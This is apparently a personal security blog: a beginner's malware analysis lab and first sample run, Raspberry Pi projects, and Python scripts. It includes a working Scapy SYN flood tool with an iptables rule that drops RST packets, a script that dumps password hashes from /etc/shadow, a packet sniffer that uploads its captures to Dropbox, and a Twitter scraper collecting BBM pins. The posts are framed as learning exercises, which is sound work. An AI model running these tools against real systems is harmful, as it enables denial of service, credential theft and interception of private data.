Malware Analysis Part 2: First Attempt

Please read Part 1 first if you would like to know how the analysis lab is set up.

There are various sites you can use to download sample malicious software. I wasn’t completely sure which sample to choose from the one I used. I wanted one that was recent, so I decided to get a sample called “BC.Heuristic.Trojan.SusPacked.BF-6.A”. I’m not going to link to it for obvious reasons, but the MD5 hash of the sample is 0148d6e7f75480b3353f1416328b5135. This can be used as a search term on the open malware site to find the sample I used in this analysis attempt.

Once I had downloaded the file I took a snapshot of the registry and files on the machine using Regshot. I then ran the file, took another snapshot and compared the two. The results show that multiple files and a folder were created when it executed.

Files added: 3
C:\Program Files\Windos\logg.dat
C:\Program Files\Windos\Windos.exe
Files [attributes?] modified: 3
C:\Documents and Settings\james\NTUSER.DAT.LOG
Folders added: 1
C:\Program Files\Windos
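
The before-and-after comparison can be illustrated with a minimal Python sketch. It is not how Regshot works internally and it only covers files, not the registry; the function names snapshot and compare are made up for this example.

```python
import os


def snapshot(root):
    """Map every file path under root to its (size, modification time)."""
    state = {}
    for folder, _subfolders, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            try:
                info = os.stat(path)
            except OSError:
                continue  # the file vanished or is unreadable, so skip it
            state[path] = (info.st_size, info.st_mtime)
    return state


def compare(before, after):
    """Return sorted lists of added, deleted and modified file paths."""
    added = sorted(set(after) - set(before))
    deleted = sorted(set(before) - set(after))
    modified = sorted(
        path for path in before
        if path in after and before[path] != after[path]
    )
    return added, deleted, modified
```

Taking one snapshot before running the sample and one after, then passing both to compare, would give lists similar to the "Files added" and "Files modified" sections above.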

I also noticed that the Debian server had received a flood of DNS requests from the malware-infected machine.


So the malware is attempting to look up the IP address of its server, and I assume it will either download additional components or send some data to that server.

Because of this DNS request, the next step I figured was to put my DNS server to good use and respond to the request with one of my own IPs to see what the malware did next. So I opened the /etc/hosts file and added a new entry pointing (redacted) to my Debian server. I then started Wireshark on the malware-infested machine and restarted the DNS daemon.


This part I’m not 100% sure about. From what I can gather, the malware is trying to start a TCP connection with my Debian server on port 81, which some port lists unofficially associate with Tor, although that doesn’t necessarily mean it’s trying to connect to the Tor network in any way. Whatever it’s trying to do, the server isn’t responding appropriately (or at all), and therefore the connection isn’t fully made. The next step I took was to set up a netcat listener on the port to see what was being sent. To do this I entered the following command:

nc -l -p 81

-l specifies a listener and -p the port I want to listen on.

As you can see, what I received is unintelligible.
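
When the received data is not readable text, a hex dump is usually easier to work with than raw terminal output. The sketch below is a rough Python 3 stand-in for the netcat listener: it accepts a single connection and returns whatever arrives first. The function names listen_once and hexdump are made up for this example, and it assumes the malware sends something straight after connecting.

```python
import socket


def hexdump(data, width=16):
    """Format bytes as offset, hex values and printable ASCII, one row per line."""
    lines = []
    for offset in range(0, len(data), width):
        chunk = bytearray(data[offset:offset + width])
        hex_part = " ".join("%02x" % byte for byte in chunk)
        text_part = "".join(
            chr(byte) if 32 <= byte < 127 else "." for byte in chunk
        )
        lines.append("%08x  %-*s  %s" % (offset, width * 3 - 1, hex_part, text_part))
    return "\n".join(lines)


def listen_once(port, host="0.0.0.0", max_bytes=4096):
    """Accept one TCP connection and return the first bytes it sends."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, port))
    server.listen(1)
    try:
        connection, _address = server.accept()
        try:
            return connection.recv(max_bytes)
        finally:
            connection.close()
    finally:
        server.close()
```

Running print(hexdump(listen_once(81))) on the Debian server would wait for the connection and then print the bytes. As with netcat, binding to a port below 1024 normally needs root.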

In my next post I will continue the analysis of this file, once I have figured out where to go from here :)

Malware Analysis Part 1: Lab Setup

At this stage I know very little about the malware analysis process. I recently purchased a book on the subject called “Practical Malware Analysis” by Michael Sikorski and Andrew Honig. My aim is to read through the book and practise the techniques taught on real examples of malicious code, updating this blog as I progress.

The first step, which I will detail today, is the setup of my virtual lab. For the hardware I have used my old gaming computer. It’s not very good at running games anymore but is perfect for malware analysis. I have installed the Debian Linux distribution on it, along with VirtualBox.

There are pros and cons to using virtualisation for malware analysis. The pros include the ability to create snapshots of the working environment and the ability to create virtual networks, which I will explain later. One downside I have read about is that some malware will behave differently if it discovers it’s being run in a virtualised environment, with the sole purpose of preventing it from being analysed.

So in my setup I am using VirtualBox to create the virtual machines. I am using a Windows XP Professional machine loaded with any tools I may need, along with a Debian machine used as a DNS / mail / IRC / etc. server. Some malware will attempt to communicate in some way with something on the internet, whether it be through IRC, a simple DNS request or a mail protocol. Having a virtual Debian machine with these services installed allows me to receive the requests and see in more detail what they are doing.


As you can see from the screenshot, I have created clones of both virtual machines. This allows me to easily start afresh without having to reinstall all the tools again. Both machines are in host-only mode and connected to a virtual network called vboxnet0. This prevents the malware from escaping the virtual machine and propagating throughout my network. I am also extremely paranoid and will unplug the network cable from the computer when performing the analysis.

The only software I will install on Debian to start with is a DNS server. This will allow me to redirect any DNS queries the malware may make to a computer of my choice (mine). I decided to use Dnsmasq for this purpose as it’s very simple to set up.

I simply installed Dnsmasq with the command:

apt-get install dnsmasq

And edited the /etc/dnsmasq.conf file to only allow queries on a specific interface, in my case eth0:

# If you want dnsmasq to listen for DHCP and DNS requests only on
# specified interfaces (and the loopback) give the name of the
# interface (eg eth0) here.
# Repeat the line for more than one interface.
interface=eth0

and to allow for logging of DNS requests:

# For debugging purposes, log each DNS query as it passes through
# dnsmasq.
log-queries

I also added a test record to the /etc/hosts file, pointing a test domain to a test IP address.


Next I’m going to set up Windows XP to use my virtual Debian machine as a DNS server. I’m not going to explain how I did this; if you’re reading this you probably know already. I tested the configuration with nslookup.


As you can see, the DNS server responded with the test IP.

I can monitor the DNS requests being made to the server by using the command:

tail -f /var/log/syslog

This should turn out useful when running the malware.
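
Once the malware starts generating a lot of lookups, the raw syslog output gets noisy. Below is a minimal Python sketch that picks out just the query lines. It assumes dnsmasq writes its query log entries in the form "dnsmasq[PID]: query[TYPE] NAME from CLIENT"; the function names, the sample domain and the sample address in the usage note are made up for illustration.

```python
import re

# Assumed layout of a dnsmasq query log entry inside a syslog line.
QUERY_PATTERN = re.compile(
    r"dnsmasq\[\d+\]: query\[(?P<type>[A-Za-z0-9]+)\] "
    r"(?P<name>\S+) from (?P<client>\S+)"
)


def parse_query(line):
    """Return (record type, queried name, client address) or None."""
    match = QUERY_PATTERN.search(line)
    if match is None:
        return None
    return match.group("type"), match.group("name"), match.group("client")


def queries_in_log(lines):
    """Keep only the lines that are DNS queries, in parsed form."""
    parsed = (parse_query(line) for line in lines)
    return [query for query in parsed if query is not None]
```

For a line such as "Mar  3 10:15:01 debian dnsmasq[2345]: query[A] example.test from 192.168.56.101", parse_query would return the record type, the name and the client address, which makes it easy to list the distinct domains a sample asks for.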


Now I’m going to detail some of the software I have installed on the target machine. At this stage I haven’t even attempted to look at any malware so I am likely missing some necessary tools. Once the malware is on the machine it won’t have access to the internet. Because of this I have tried to plan ahead and install everything I suspect I will need. There’s a high chance I will miss something having never done this before.

This tool allows you to take a snapshot of your machine in two different states and then compare them. For example, you may make a snapshot before and after you have run some malware. Comparing the two snapshots will allow you to see the changes the malware has made to the system. It records new files / folders and registry changes.

Process Explorer
This is basically Task Manager on steroids. It allows you to see the processes that are running.

This allows you to monitor network traffic, in this case traffic created by the malware.

Process Monitor
Allows you to see events which happen when a program is run. For example changes, modifications and execution of files.

Allows you to monitor files and network activity

I have never used this software before. From general reading, it allows you to run a program through it and watch how it interacts with the underlying system. It allows you to see the instructions it executes in the form of assembly language and also the data it stores.

A more powerful version of Windows notepad.

Part of the SysInternals suite. It allows you to scan a file for strings (sequences of readable characters).
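
To give an idea of what scanning a file for strings involves, here is a minimal Python sketch. It is not the SysInternals tool itself and only looks for runs of printable ASCII; the function name extract_strings and the minimum length of 4 are choices made for this example.

```python
import re


def extract_strings(data, min_length=4):
    """Return runs of printable ASCII characters found in a bytes object."""
    # \x20 to \x7e covers space through tilde, the printable ASCII range.
    pattern = re.compile((r"[\x20-\x7e]{%d,}" % min_length).encode("ascii"))
    return [match.decode("ascii") for match in pattern.findall(data)]
```

Reading a sample with open(path, "rb").read() and passing the result to extract_strings would list things like file names, registry keys and domain names embedded in the binary, provided the sample is not packed or obfuscated.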

Once I had installed the software above I saved the virtual machine and cloned it. This lets me work on the cloned version when analysing the malware and revert to the original clean machine if I need to start again.

True Random Number Generator using the Raspberry Pi

Last weekend I turned my Raspberry Pi into a true random number generator using the static from a TV. Here in the UK we no longer receive analogue terrestrial broadcasts, so finding static on my TV is as simple as putting it on the analogue channel.

The setup I was using is an eSecure - USB 8MP webcam plugged into the Raspberry Pi and pointed at the TV. I used a Python script to calculate the random numbers. I also made a video of the process which can be found at this link here.

The first step was to take a picture of the static on the TV. To do this I used the subprocess module in Python.

captureImage = subprocess.Popen(["fswebcam", "-r", "356x292", "-d", "/dev/video0", "static.jpg", "--skip", "10"], stdout=devNull, stderr=devNull)

As you can see, this simply spawns the fswebcam process to take a picture and save it as static.jpg. These pictures look like the following:

[Images: static1, static2]

The next stage is to convert these images into black and white images. I imported the Python Imaging Library into my script to manipulate and read the image files.

staticImage = Image.open("static.jpg")
bW_Image = staticImage.convert('1')


The next stage was to iterate over the black and white image and read the value of each pixel, each value being either 0 or 255 depending on whether the pixel was black or white. The result was added to a variable called randomBits, with 0 for a black pixel and 1 for a white pixel.

while pixelRow < staticImage.size[0]:
    while pixelColumn < staticImage.size[1]:
        if imageToProcess[pixelRow, pixelColumn] == 0:
            randomBits = randomBits + "0"
        else:
            randomBits = randomBits + "1"
        pixelColumn = pixelColumn + 1
    pixelRow = pixelRow + 1
    pixelColumn = 0

This randomBits variable is then written to an output file as a base 10 number. This means that the long binary string is converted to a decimal value and written to the output file. This decimal number is the random value calculated from the image.

output = open('output.txt', 'w')
output.write(str(int(randomBits, 2)))
output.close()
print int(randomBits, 2)
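
The pixel-to-number step can be tried without a webcam. The sketch below is written for Python 3 and uses a small hand-made grid of pixel values in place of a real image; the function names and the sample grid are made up for illustration. Note that it reads the grid row by row, whereas the script above walks the image using its own loop order.

```python
def pixels_to_bits(rows):
    """Turn rows of 0/255 pixel values into a string of '0' and '1' characters."""
    return "".join("0" if pixel == 0 else "1" for row in rows for pixel in row)


def bits_to_number(bits):
    """Interpret a string of binary digits as a base 10 integer."""
    return int(bits, 2)


# A tiny stand-in for a thresholded image: 0 is black, 255 is white.
sample = [
    [0, 255, 255],
    [255, 0, 255],
]
bits = pixels_to_bits(sample)
number = bits_to_number(bits)
print(bits, number)  # prints: 011101 29
```

One thing this makes visible is that any leading zero bits disappear when the string is converted to an integer, so the decimal value does not record how many bits were captured.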

The full source code can be copied from the box below.

import Image
import subprocess
devNull = open('/dev/null', 'w')#used to output the fswebcam stdout and stderr
name = 0
while True:
    name = name + 1
    randomBits = ""
    pixelRow = 0
    pixelColumn = 0
    captureImage = subprocess.Popen(["fswebcam", "-r", "356x292", "-d", "/dev/video0", "static.jpg", "--skip", "10"], stdout=devNull, stderr=devNull)
    captureImage.communicate()#Waits for the command detailed above, which takes a picture using the webcam, to finish
    staticImage = Image.open("static.jpg")#Opens the image
    bW_Image = staticImage.convert('1')#Converts the image to a black or white image
    imageToProcess = bW_Image.load()#Loads the pixel data so that it can be read pixel by pixel
    while pixelRow < staticImage.size[0]:#Iterates through the image pixel by pixel
        while pixelColumn < staticImage.size[1]:
            if imageToProcess[pixelRow, pixelColumn] == 0:
                randomBits = randomBits + "0"#Adds a 0 to the randomBits variable if the current pixel is black
            else:
                randomBits = randomBits + "1"#Adds a 1 to the randomBits variable if the current pixel is white
            pixelColumn = pixelColumn + 1
        pixelRow = pixelRow + 1
        pixelColumn = 0
    output = open('output.txt', 'w')
    output.write(str(int(randomBits, 2)))#Writes the randomBits variable to the output file converted to a decimal number
    output.close()#Closes the file so the number is flushed to disk on every pass
    print int(randomBits, 2)#Also prints this decimal number to the terminal

Packet Sniffing using the Raspberry Pi

In this post I intend to detail how I set up the Raspberry Pi to perform packet sniffing between two network devices. I made a YouTube video in which I explain how it works, and below you will find both the shell script and the Python script I used to set up the bridge and dump the packets respectively.

The network was set up like this:

[Diagram showing the network layout, from right to left: computer, Raspberry Pi, laptop]

The Raspberry Pi is placed in the middle and any data travelling between the two devices is captured by it. A USB to Ethernet adapter is used to provide the second interface. The adapter I used is a USB to Fast Ethernet 10/100 Mbps Network LAN Adapter Vista Linux 27723.

When the Raspberry Pi starts it loads two scripts. The first is the shell script below:

ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr bridge0
brctl addif bridge0 eth0
brctl addif bridge0 eth1
dhclient bridge0
ifconfig bridge0 up

This script removes the IP address from eth0 and eth1. It then creates a bridge called bridge0, adds the interfaces to bridge0 and starts the bridge.

##Edit## The shell script now also assigns a network address to the bridge interface to allow for network connectivity. (dhclient bridge0)

The second script, which starts after the one above, is the Python script below. It uses the Python Dropbox Uploader package which can be downloaded here.

import subprocess
from dbupload import upload_file #Used for Dropbox uploading
from datetime import datetime # Used to generate the filename
count = 0 #Counts the number of files that have been dumped
while True:
    count = count + 1
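    fileName = str(datetime.now().day) + "-" + str(datetime.now().month) + "-" + str(datetime.now().year) + " AT " + str(datetime.now().hour) + "-" + str(datetime.now().minute)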
    tcpDumpProcess = subprocess.Popen(["tcpdump", "-Z", "root", "-w", fileName, "-i", "bridge0", "-G", "60", "-W", "1"]) #Sets up the TCPDump command
    tcpDumpProcess.communicate() #Runs the TCPDump command
    print "Currently dumping file number " + str(count) + "."
    upload_file(fileName,"/",fileName, "YOUR_EMAIL","YOUR_PASSWORD") #Uploads the dump file to dropbox
    print "File uploaded Successfully"
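
The tcpdump options used above are easier to follow when the command is built up in one place. The Python 3 sketch below only constructs the file name and the argument list, it does not run anything. The function names are made up for this example, and the zero-padded day-month-year layout of the file name is an assumption rather than the exact format used in the script.

```python
from datetime import datetime


def capture_name(moment):
    """Build a file name such as '05-01-2013 AT 09-07' from a datetime."""
    return moment.strftime("%d-%m-%Y AT %H-%M")


def tcpdump_command(file_name, interface="bridge0", seconds=60):
    """Return the tcpdump argument list for one timed capture."""
    return [
        "tcpdump",
        "-Z", "root",          # keep running as root instead of dropping privileges
        "-w", file_name,       # write raw packets to this file
        "-i", interface,       # capture on the bridge interface
        "-G", str(seconds),    # rotate the dump file after this many seconds
        "-W", "1",             # stop after a single file has been written
    ]
```

Passing the returned list to subprocess.Popen gives the same one-minute capture as the script above, because -G together with -W 1 makes tcpdump exit after the first rotation.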

This can obviously be done without Python by running the tcpdump command from the command line. My intention was to integrate Dropbox uploading into the process. This initially failed because the Raspberry Pi could not get an internet connection when configured with a software bridge.
An internet connection can be configured on the Raspberry Pi simply by adding network settings to the bridge interface. In my case I used DHCP to do this automatically by adding dhclient bridge0 to the shell script.

With both these files saved onto the Raspberry Pi and executed from the rc.local file at startup, the Raspberry Pi will automatically capture network traffic between the two devices.

Dumping Linux Password Hashes

In my push to keep learning the Python programming language I thought a good next step would be to make a simple script that grabs the password hashes on a Linux device and dumps them to a file. The dump is formatted so that it is easy to read, unlike the formatting used in the shadow file. I made this script purely for the challenge. It is not intended to be used for anything other than educational purposes.

So, some background. Linux passwords are stored as hashes. A hash is a one-way mathematical function which is applied to the password to change it into something unintelligible. It is important to understand that this is a one-way process: you are unable to convert hashed data back to its intelligible form. One way of cracking hashed passwords is to use rainbow tables. Put simply, these are tables populated with precomputed hashes and their paired plaintext passwords. They usually contain thousands of entries, each a matching plaintext / hash value pair.

Let’s say, for example, you have a password hash: 436ad45345deed32. You want to find the password this hash represents using a rainbow table.

The rainbow table may look like the following:

        | password             |  43f54abeee342abe          |
        |                      |                            |
        | qwerty               |  AB5445afd56ad345          |
        |                      |                            |
        | dragon               |  4554bd44dd34cb32          |
        |                      |                            |
        | monkey               |  f632abcd345c34dc          |
        |                      |                            |
        | supersecurepass      |  436ad45345deed32          |
        |                      |                            |
        | letmein              |  4fd43344decad356          |
        |                      |                            |
        | baseball             |  ab4564fd4ed4556d          |
        |                      |                            |
        | mypass               |  c34ddef567ab345d          |
        |                      |                            |

You check your hash value against each one in the rainbow table until a match is found. When a match is found the matching plaintext password is looked up, and you now have the password.
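
The lookup described above can be sketched in a few lines of Python. This is a simplified illustration: it uses a plain dictionary of precomputed hashes rather than a real rainbow table, and SHA-256 from hashlib stands in for whatever hash function the target system uses. The function names and word list are made up for this example.

```python
import hashlib


def hash_password(password):
    """Hash a password with SHA-256 and return the hex digest."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_table(candidates):
    """Precompute a hash -> plaintext lookup for a list of candidate passwords."""
    return {hash_password(word): word for word in candidates}


def crack(target_hash, table):
    """Return the plaintext for target_hash, or None if it is not in the table."""
    return table.get(target_hash)
```

Building the table once with a list such as ["password", "qwerty", "supersecurepass"] and then calling crack with an unknown hash returns the password only if it was among the candidates, which is why weak, common passwords fall first.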

To combat this weakness an extra value is used when hashing the password. This value is called a salt. The salt is a random value which is added to the password before it is hashed.

Without Salt:

   Password        Hash Function           Hash Value
  |           |                        |                   |
  |secpass123 | +------------------->  | ad4565bcd34dea    |
  |           |                        |                   |

With Salt:

   Password       Salt           Concatenation         Hash Function     Hash Value
  |          |             |                       |                  |                |
  |secpass123| mysaltvalue | secpass123mysaltvalue | +------------->  | adb345252aed4f |
  |          |             |                       |                  |                |

By introducing this salt value before the hashing takes place, the rainbow tables become much less efficient. To generate a rainbow table you will need not only a list of passwords but also the salt value that goes with each password. A table that was precomputed without the right salt won’t work, so a separate table would be needed for every salt value.

On UNIX systems these hashes are stored in a shadow file located at /etc/shadow. This is obviously locked out to anyone other than root by default, which means the script won’t work unless run as root or with sudo.
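
A short Python sketch shows the effect of the salt. It follows the diagram above by simply concatenating the password and the salt before hashing with SHA-256. That is an illustration only, since the real crypt schemes used in the shadow file are more involved. The function names are made up for this example.

```python
import binascii
import hashlib
import os


def new_salt(length=8):
    """Generate a random salt as a hex string from length random bytes."""
    return binascii.hexlify(os.urandom(length)).decode("ascii")


def salted_hash(password, salt):
    """Concatenate password and salt, then hash the result with SHA-256."""
    return hashlib.sha256((password + salt).encode("utf-8")).hexdigest()
```

Calling salted_hash("secpass123", new_salt()) twice gives two different hash values for the same password, so a table precomputed for one salt is of no use against the other.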

How it works

Running the script below reads this shadow file and outputs the results to both the terminal and a text file in the same location as where you saved the python script. The text file is called dump.txt.

Each entry in the shadow file is stored as a series of fields delimited by colons. The first part is the username, followed by a colon. The next part is the hash and salt, followed by a colon, and so on.
The script relies a lot on slices, which allow you to slice a string into parts.

An example of an entry in the shadow file


To get the username I sliced from index 0 of the string to the index of the first colon.
After the first colon there are the characters $?$, the ? being a number which indicates the hash function used on the password. This value was easily obtained in the script as it is always two characters after the first colon.
Next is the salt value. This comes directly after the hash type and ends with a $. A for loop is used in the script to gather the index values of both the colons and the dollar symbols. This makes the extraction of the values from the whole string much simpler.
Next is the password hash, gathered by slicing the whole string from the index of the 3rd dollar sign to the 2nd colon.
The last piece gathered in the script is the maximum password age, the number of days after which the password must be changed. This was gathered by slicing the string between the 4th and 5th colons.

shadowFile = open('/etc/shadow', 'r')
shadowFileList = shadowFile.readlines()
dump = open('dump.txt', 'w')
for user in shadowFileList:
    if '$' in user:
        print 'The username is: ' + user[0:user.find(':')]
        dump.write('The username is: ' + user[0:user.find(':')] + '\n')
        hashtype = user[user.find(':') + 2]
        count = 0
        for letter in hashtype:
            if letter == '$':
                count = count + 1
        if hashtype == '1':
            hashtype = 'The hashing algorithm used is: MD5'
            dump.write('The hashing algorithm used is: MD5\n')
        elif hashtype == '2':
            hashtype = 'The hashing algorithm used is: BlowFish'
            dump.write('The hashing algorithm used is: BlowFish\n')
        elif hashtype == '5':
            hashtype = 'The hashing algorithm used is: SHA256'
            dump.write('The hashing algorithm used is: SHA256\n')
        elif hashtype == '6':
            hashtype = 'The hashing algorithm used is: SHA512'
            dump.write('The hashing algorithm used is: SHA512\n')
        else:
            hashtype = 'The hashing algorithm used is Unknown. It has a hash code value of:' + hashtype + '.'
            dump.write(hashtype + '\n')
        print hashtype
        delimitercolon = []
        delimiterdolla = []
        count = 0
        for char in user:
            if char == ':':
                delimitercolon.append(count)
            if char == '$':
                delimiterdolla.append(count)
            count = count + 1
        print 'The Hash is: ' + user[delimiterdolla[2] + 1:delimitercolon[1]]
        dump.write('The Hash is: ' + user[delimiterdolla[2] + 1:delimitercolon[1]] + '\n')
        print 'The Salt is: ' + user[delimiterdolla[1] + 1:delimiterdolla[2]]
        dump.write('The Salt is: ' + user[delimiterdolla[1] + 1:delimiterdolla[2]] + '\n')
        print 'The password is set to expire in ' + user[delimitercolon[3] + 1:delimitercolon[4]] + ' days.\n\n'
        dump.write('The password is set to expire in ' + user[delimitercolon[3] + 1:delimitercolon[4]] + ' days.\n\n\n')

The output looks like the following:

 The username is: test
 The hashing algorithm used is: SHA512
 The Hash is: oDexE5blBiNer7V2qHXVgQvdhSzChH2kmQ2.op4nHLPxMldePB3CyEizwyhhLo3lwpTIFnzqN30KuQOKEFuVe1
 The Salt is: 54dYBZqz
 The password is set to expire in 99999 days.
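
The same fields can also be pulled out by splitting on the delimiters instead of slicing by index. The Python 3 sketch below is an alternative illustration, not the script above. It assumes the plain $id$salt$hash layout, so entries with extra parameters between the dollar signs are not handled, and the function name parse_shadow_line is made up for this example.

```python
# Hash identifiers that use the plain $id$salt$hash layout.
HASH_NAMES = {"1": "MD5", "5": "SHA256", "6": "SHA512"}


def parse_shadow_line(line):
    """Split one shadow entry into its parts, or return None if it has no hash."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 5 or not fields[1].startswith("$"):
        return None  # locked or passwordless accounts have no $id$salt$hash
    parts = fields[1].split("$")  # ['', id, salt, hash]
    if len(parts) < 4:
        return None
    hash_id, salt, digest = parts[1], parts[2], parts[3]
    return {
        "username": fields[0],
        "algorithm": HASH_NAMES.get(hash_id, "Unknown (" + hash_id + ")"),
        "salt": salt,
        "hash": digest,
        "max_age_days": fields[4],  # 5th field, between the 4th and 5th colons
    }
```

Feeding it each line of /etc/shadow (as root) and skipping the None results would give the same values as the output shown above, keyed by name rather than position.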

If you have any questions please let me know in the comments or by email james[at]. Feel free to use the code or change it in any way.

BBM Pin Aggregation from Twitter

I was trying to think of a good way to get some more practice with Python, especially in interacting with some kind of API. @wimremes on Twitter gave me a good idea with this tweet.

I made a simple Python script using the python-twitter wrapper for the Twitter API. It performs a search every 3 minutes for the search term “my bbm pin” and saves each pin it finds into a results.txt file in the same folder. I don’t know why people would want to share their BBM pin with random people, but I thought it was quite amusing nonetheless. You will need the Python-Twitter wrapper for it to work.

Just leave this script running and see how many it finds.

import twitter
import string
import re
import time
api = twitter.Api(consumer_key ='YOUR_KEY',  consumer_secret='YOUR_SECRET',  access_token_key='YOUR_ACCESS_KEY',  access_token_secret='YOUR_ACCESS_SECRET') #Enter your Twitter API details here.
loopControl = True
while loopControl == True: #used to keep the programming running
    bbmPins = api.GetSearch(term='my bbm pin') #The search term sent to the twitter API
    for bbm in bbmPins:
        status =  bbm.GetText().encode('utf-8') #Converts the unicode string returned by the API to UTF-8. this allows for punctuation to be removed more easily.
        statusNoPunct = status.translate(None, string.punctuation).lower() #Removes the punctuation and converts the statuses to lower case.
        wordList = statusNoPunct.split() #Splits the statuses into individual words.
        for word in wordList:
            if len(word) == 8: #Checks if the word in 8 characters long. (BBM pins are 8 characters long).
            	#Filters out any non-hexadecimal words (BBM pins are hexadecimal)
                if not 'g' in word and not 'h' in word and not 'i' in word and not 'j' in word and not 'k' in word and not 'l' in word and not 'm' in word and not 'n' in word and not 'o' in word and not 'p' in word and not 'q' in word and not 'r' in word and not 's' in word and not 't' in word and not 'u' in word and not 'v' in word and not 'w' in word and not 'x' in word and not 'y' in word and not 'z' in word:
                    results = open('results.txt', 'a+')
                    if not word in results.read(): #Checks if the pin already exists in the file
                        results.write(word + "\n") #Writes the pin to the file
                    print word
            if len(word) == 11: #Some people posted the BBM pins as so Pin:25B46EE0. With the : and . omitted in line 11 this will be 11 characters long.
                if 'pin' in word:
                    sliceWord = word[3: len(word)] #Strips the word "pin" from the beginning of the pin (pin25B46EE0 > 25B46EE0)
                    results = open('results.txt', 'a+')
                    if not sliceWord in results.read(): #Checks if the pin already exists in the file.
                        results.write(sliceWord + "\n") #Writes the pin to the file
                    print sliceWord
    time.sleep(180) #sleep for 3 minutes before starting again.

SYN Flooding with Scapy and Python

What is a SYN flood?

When a connection is made from client to server over TCP it is initialised with a three-way handshake. Each of the three stages of the handshake sends a different type of TCP segment across the network.

  1. Client sends SYN (synchronize) to server
  2. Server sends SYN-ACK (synchronize Acknowledgement) back to the client
  3. Client sends ACK back to server

This three-way handshake establishes the connection between the client and server.
When performing a SYN flood only the first two parts of the three-way handshake are completed. A request to synchronise is made to the server. The server acknowledges the synchronisation, but the final acknowledgement from the client is never sent back. This leaves the server with half-open connections, which can result in a denial of service if the process is repeated and replicated by multiple machines.
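
Why half-open connections cause a denial of service can be shown with a toy model that sends no network traffic at all. The Python sketch below treats the server's store of half-open connections as a fixed-size set; the class name SynBacklog and the capacity value are made up for this example, and real TCP stacks add timeouts and other defences that are left out here.

```python
class SynBacklog:
    """Toy model of a server's table of half-open TCP connections."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.half_open = set()    # SYN received, SYN-ACK sent, no ACK yet
        self.established = set()  # handshake completed
        self.dropped = 0          # SYNs refused because the table was full

    def on_syn(self, client):
        """Step 1 and 2: remember the client, unless the table is full."""
        if len(self.half_open) >= self.capacity:
            self.dropped += 1
            return False
        self.half_open.add(client)
        return True

    def on_ack(self, client):
        """Step 3: the final ACK frees the slot and completes the connection."""
        if client not in self.half_open:
            return False
        self.half_open.remove(client)
        self.established.add(client)
        return True
```

If a SynBacklog(3) receives three SYNs that are never followed by an ACK, every later call to on_syn is refused, including one from a legitimate client, until a slot is freed.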

Initial setup

By default the Linux kernel sends an RST in response to a SYN-ACK received from the server. This is because the kernel knows nothing about the connection Scapy started, so it treats the SYN-ACK as unexpected. You can read more about it here. For this reason an iptables rule needs to be created to block any outgoing RST packets.

sudo iptables -A OUTPUT -p tcp -s YOUR_LOCAL_IP --tcp-flags RST RST -j DROP

(YOUR_LOCAL_IP is the source address, the local IP address)

My Python Script

Below is a Python script that uses Scapy, a program which allows you to both manipulate and send packets, as well as a whole host of other things. It was created purely as an educational tool and shows how Scapy can be used from Python.

The Python script takes 3 arguments:

-d The destination IP address for the SYN packet
-c The amount of SYN packets to send. (enter X for unlimited)
-p The destination port for the SYN packet

As it uses the send function in scapy it must be run as root user.


sudo python SCRIPT_NAME.py -d TARGET_IP -c x -p 80

This will send a constant SYN flood to the target IP address on port 80.

sudo python SCRIPT_NAME.py -d TARGET_IP -c 100 -p 80

This will send 100 SYN segments to the target IP address on port 80.

The script sets the source IP to your local IP. The source port is randomised.

import sys
import random
import logging # This and the following line are used to omit the IPv6 error displayed by importing scapy.
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import argparse
import os
import urllib2
if os.getuid() != 0: # Checks to see if the user running the script is root.
    print("You need to run this program as root for it to function correctly.")
    sys.exit(1)
parser = argparse.ArgumentParser(description='This educational tool sends SYN requests to the target specified in the arguments.') # This and preceding 4 lines used to control the arguments entered in the CLI.
parser.add_argument('-d', action="store",dest='source', help='The destination IP address for the SYN packet')
parser.add_argument('-c', action="store",dest='count', help='The amount of SYN packets to send. (enter X for unlimited)')
parser.add_argument('-p', action="store",dest='port', help='The destination port for the SYN packet')
args = parser.parse_args()
if len(sys.argv) == 1: # Forces the help text to be displayed if no arguments are entered
    parser.print_help()
    sys.exit(1)
args = vars(args) # converts the arguments into dictionary format for easier retrieval.
iterationCount = 0 # variable used to control the while loop for the amount of times a packet is sent.
if args['count'] == "X" or args['count'] == "x": # If the user entered an X or x into the count argument (wants unlimited SYN segments sent)
    while (1 == 1):
        a=IP(dst=args['source'])/TCP(flags="S",  sport=RandShort(),  dport=int(args['port'])) # Creates the packet and assigns it to variable a
        send(a,  verbose=0) # Sends the Packet
        iterationCount = iterationCount + 1
        print(str(iterationCount) + " Packet Sent")
else: # executed if the user defined an amount of segments to send.
    while iterationCount < int(args['count']):
        a=IP(dst=args['source'])/TCP(flags="S", sport=RandShort(), dport=int(args['port'])) # Creates the packet and assigns it to variable a
        send(a,  verbose=0) # Sends the Packet
        iterationCount = iterationCount + 1
        print(str(iterationCount) + " Packet Sent")
print("All packets successfully sent.")

The Results
When the script is executed the packets are sent to the destination IP address. This can be viewed in Wireshark. Note the random source ports which appear on each packet.

The target was a Backtrack 5 R2 virtual machine running an Apache web server on port 80. By entering the command “netstat -at” you can view all TCP sockets, both listening and non-listening.
As you can see from the screenshot, there are 10 half-open TCP connections which have been created because of the 10 SYN segments that were sent previously.

More information about Scapy can be found on its website, and an advisory has been published for the TCP SYN attack.

The Vigenère cipher in Python

The Vigenère cipher is a polyalphabetic substitution cipher system designed by Giovan Battista Bellaso and improved upon by Blaise de Vigenère. It functions very similarly to a Caesar shift cipher, where a shift of lettering occurs. Unlike the Caesar shift cipher, the Vigenère cipher performs a different shift per character. For example the first letter may have a shift of 4 and the second letter may have a shift of 8 and so on. A key is used to define the shift value for each letter. In this script each character of the key is a letter of the alphabet.

The program works by retrieving the index values of the characters from the key and the plain text in turn. These values are then added together and the resulting number is equal to the index value corresponding to the cipher text. For example:
We have an alphabet with each letter assigned a value: a = 0, b = 1, c = 2 and so on.
If we were to have the key R and the plain text letter P we would add the values 17 for R and 15 for P. 17 + 15 = 32.
If the value is greater than 25 we keep subtracting 26 until we get a number less than 26. 32 - 26 = 6.
We now look up the value 6 in the alphabet index. The value at index 6 is G.
The program simply loops through this process for each letter in the plain text until the cipher text is complete.
Feel free to use the code however you want. Let me know if you do as I would be interested in its implementation.

# Name:        Vigenere Cipher
# Purpose:
# Author:      James Woolley
